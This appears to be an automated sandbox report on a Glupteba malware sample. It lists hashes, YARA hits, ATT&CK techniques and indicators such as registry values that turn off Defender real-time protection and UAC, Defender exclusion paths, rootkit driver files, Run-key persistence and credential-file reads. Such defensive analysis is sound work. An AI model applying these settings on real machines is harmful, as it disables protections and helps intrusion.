glupteba | 4329b1deaf46731c0e7a55e4ca9adaefa6daa9f8f6015c8ece22dee784898c18

Analysis

max time kernel
149s
max time network
154s
platform
windows7_x64
resource
win7-20231025-en
resource tags

arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system
submitted
22/11/2023, 01:56

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

10.9MB
MD5

e9803cbb6c6983f66221c2806cb4db29
SHA1

be7dca4853a2202ca6a39cea5baf3c6019c48950
SHA256

4329b1deaf46731c0e7a55e4ca9adaefa6daa9f8f6015c8ece22dee784898c18
SHA512

47577ece52ceeb30ae5eb62db8b34d3d9bbedd973624ca0d7b5f72d94c6a88a7503af6de6b737e78cfd1ba1507af89290bfdd6206ee8baa4c73bddc600ee5808
SSDEEP

98304:5YyXHUFVhcJu+3gPqajeIef22tXG9su3/IRGL/gCVzcXcbDwelg2RMYKqUrNqEK0:5Yk/0ef2B9L/NcM42RfKqUrNqT0

Score

10^/10

glupteba discovery dropper evasion loader persistence rootkit spyware stealer trojan upx

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 14 IoCs

resource	yara_rule
behavioral1/memory/1980-155-0x0000000002B50000-0x000000000343B000-memory.dmp	family_glupteba
behavioral1/memory/1980-157-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1980-167-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1980-217-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1980-226-0x0000000002B50000-0x000000000343B000-memory.dmp	family_glupteba
behavioral1/memory/2528-334-0x0000000002A80000-0x000000000336B000-memory.dmp	family_glupteba
behavioral1/memory/2528-335-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2528-381-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/876-469-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/876-523-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/876-759-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/876-762-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/876-773-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/876-794-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file.exe

Windows security bypass 2 TTPs 49 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\UafCZ03bq3wLe5tapLQOnk5r.exe = "0"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	UafCZ03bq3wLe5tapLQOnk5r.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	UafCZ03bq3wLe5tapLQOnk5r.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0"	file.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KLjJYzCUqgUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OFVgegHnELnCC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OFVgegHnELnCC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\VeitDxgWDfCRoOtN = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AtBFliYUSCIU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\VeitDxgWDfCRoOtN = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KcvIfpBEU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\aFeOAQnlubilNTVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	file.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AtBFliYUSCIU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\aFeOAQnlubilNTVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	UafCZ03bq3wLe5tapLQOnk5r.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KcvIfpBEU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	UafCZ03bq3wLe5tapLQOnk5r.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\VeitDxgWDfCRoOtN = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KLjJYzCUqgUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\VeitDxgWDfCRoOtN = "0"	reg.exe

Modifies boot configuration data using bcdedit 14 IoCs

pid	Process
1348	bcdedit.exe
2844	bcdedit.exe
3032	bcdedit.exe
1688	bcdedit.exe
2904	bcdedit.exe
1188	bcdedit.exe
3028	bcdedit.exe
1976	bcdedit.exe
756	bcdedit.exe
1220	bcdedit.exe
2380	bcdedit.exe
1164	bcdedit.exe
1232	bcdedit.exe
1508	bcdedit.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
2944	netsh.exe

Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\h4B9sInOqKzolCRTZL3QqAZd.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cckftLzteyh22tb3uPq6QbxE.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bXNVo8BZdbSjPbAzOq1qefGH.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TLLvqUzRdgvaXH8WQlukWMKX.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bD9pmlT7Z7YWjFKASnpKWoba.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I6v40ymo0GJqr8Un5es7jqXb.bat	CasPol.exe

Executes dropped EXE 19 IoCs

pid	Process
2820	axQWAftu86RVgyfsYbxmxw7K.exe
2540	e3ZJYTWX0UncjG7y6k8OxQNP.exe
1980	UafCZ03bq3wLe5tapLQOnk5r.exe
1696	Broom.exe
2460	Wa7OnNbYsdrgMnxTs5wzD67g.exe
592	Install.exe
1468	yfc4vidBW2iBp2WqetzvShC5.exe
2568	Install.exe
1256	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
2528	UafCZ03bq3wLe5tapLQOnk5r.exe
876	csrss.exe
1116	patch.exe
1504	injector.exe
332	dsefix.exe
1776	windefender.exe
3004	tor.exe
2716	windefender.exe
2888	oRWrcBi.exe
784	f801950a962ddba14caaa44bf084b55c.exe

Loads dropped DLL 47 IoCs

pid	Process
2876	CasPol.exe
2876	CasPol.exe
2876	CasPol.exe
2876	CasPol.exe
2876	CasPol.exe
2540	e3ZJYTWX0UncjG7y6k8OxQNP.exe
2876	CasPol.exe
2460	Wa7OnNbYsdrgMnxTs5wzD67g.exe
2460	Wa7OnNbYsdrgMnxTs5wzD67g.exe
2460	Wa7OnNbYsdrgMnxTs5wzD67g.exe
2460	Wa7OnNbYsdrgMnxTs5wzD67g.exe
592	Install.exe
592	Install.exe
592	Install.exe
2876	CasPol.exe
1468	yfc4vidBW2iBp2WqetzvShC5.exe
592	Install.exe
2568	Install.exe
2568	Install.exe
2568	Install.exe
1468	yfc4vidBW2iBp2WqetzvShC5.exe
2876	CasPol.exe
1256	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
1256	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
2528	UafCZ03bq3wLe5tapLQOnk5r.exe
2528	UafCZ03bq3wLe5tapLQOnk5r.exe
852	Process not Found
1116	patch.exe
1116	patch.exe
1116	patch.exe
1116	patch.exe
1116	patch.exe
876	csrss.exe
1256	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
1116	patch.exe
1116	patch.exe
1116	patch.exe
876	csrss.exe
3004	tor.exe
3004	tor.exe
3004	tor.exe
3004	tor.exe
3004	tor.exe
3004	tor.exe
3004	tor.exe
876	csrss.exe
876	csrss.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Registers COM server for autorun 1 TTPs 11 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32\ = "C:\\Program Files (x86)\\Windows NT\\Accessories\\Macro.dll"	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32\ThreadingModel = "Apartment"	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2EA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32\ = "C:\\Program Files (x86)\\Windows NT\\Accessories\\Macro.dll"	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2EA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1AA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1AA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32\ = "C:\\Program Files (x86)\\Windows NT\\Accessories\\Macro.dll"	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1AA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32\ThreadingModel = "Apartment"	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2EA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32\ThreadingModel = "Apartment"	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\CLSID\{1FA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\CLSID\{2EA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32	F4yBUpCJKyC2y0Q5QOq9UNhz.exe

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00050000000186bc-119.dat	upx
behavioral1/files/0x00050000000186bc-124.dat	upx
behavioral1/memory/1468-126-0x00000000011A0000-0x00000000016C9000-memory.dmp	upx
behavioral1/files/0x00050000000186bc-125.dat	upx
behavioral1/memory/1468-150-0x00000000011A0000-0x00000000016C9000-memory.dmp	upx
behavioral1/memory/1468-260-0x00000000011A0000-0x00000000016C9000-memory.dmp	upx
behavioral1/files/0x000400000001d391-797.dat	upx
behavioral1/memory/1776-798-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2716-826-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/1776-828-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/files/0x00070000000194d0-945.dat	upx

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\UafCZ03bq3wLe5tapLQOnk5r.exe = "0"	UafCZ03bq3wLe5tapLQOnk5r.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions	file.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	UafCZ03bq3wLe5tapLQOnk5r.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	file.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0"	file.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	UafCZ03bq3wLe5tapLQOnk5r.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Manipulates WinMon driver. 1 IoCs

Roottkits write to WinMon to hide PIDs from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMon	csrss.exe

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	oRWrcBi.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	oRWrcBi.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	oRWrcBi.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2072 set thread context of 2876	2072	file.exe	30

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	UafCZ03bq3wLe5tapLQOnk5r.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\ClocX\Presets\AJ-CityHall-500-hour.hpng	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueBallRoman.ini	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\dsaqua.bmp	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\MickeyMouse.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\GroenneKugler.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\Octopye2.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\roman\romanminute.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueBallOnlyDots.ini	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueBallRoman.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Sounds\ring.wav	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\GuldKugler.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\Uhr.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\hallow.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\BallClockIce.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\Earth2.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\greenmarble\marblehour.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\roman2\roman2hour.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Sounds\beep-ClockChime.wav	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Lang\Japanese.lng	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Lang\Romanian.lng	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\earth2.ini	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Sounds\ring2.mp3	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\Cappuccino.ini	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\LongClock.bmp	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\WidestoneStudios.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\default.bmp	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\klokje.ini	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\longhorn.ini	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\BubbleClock.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\Jaguar.bmp	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\Jaguar2.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\NewDefault.bmp	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Sounds\alert.mp3	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\ClocX.exe	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Lang\Danish.lng	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Lang\Simple_Chinese.lng	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\Blue_sphere.bmp	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\negro2.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\romanold\romanoldhour.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\Aqua_Apple_Clock.bmp	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\BigBen.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\Omega.ini	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\alarme.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
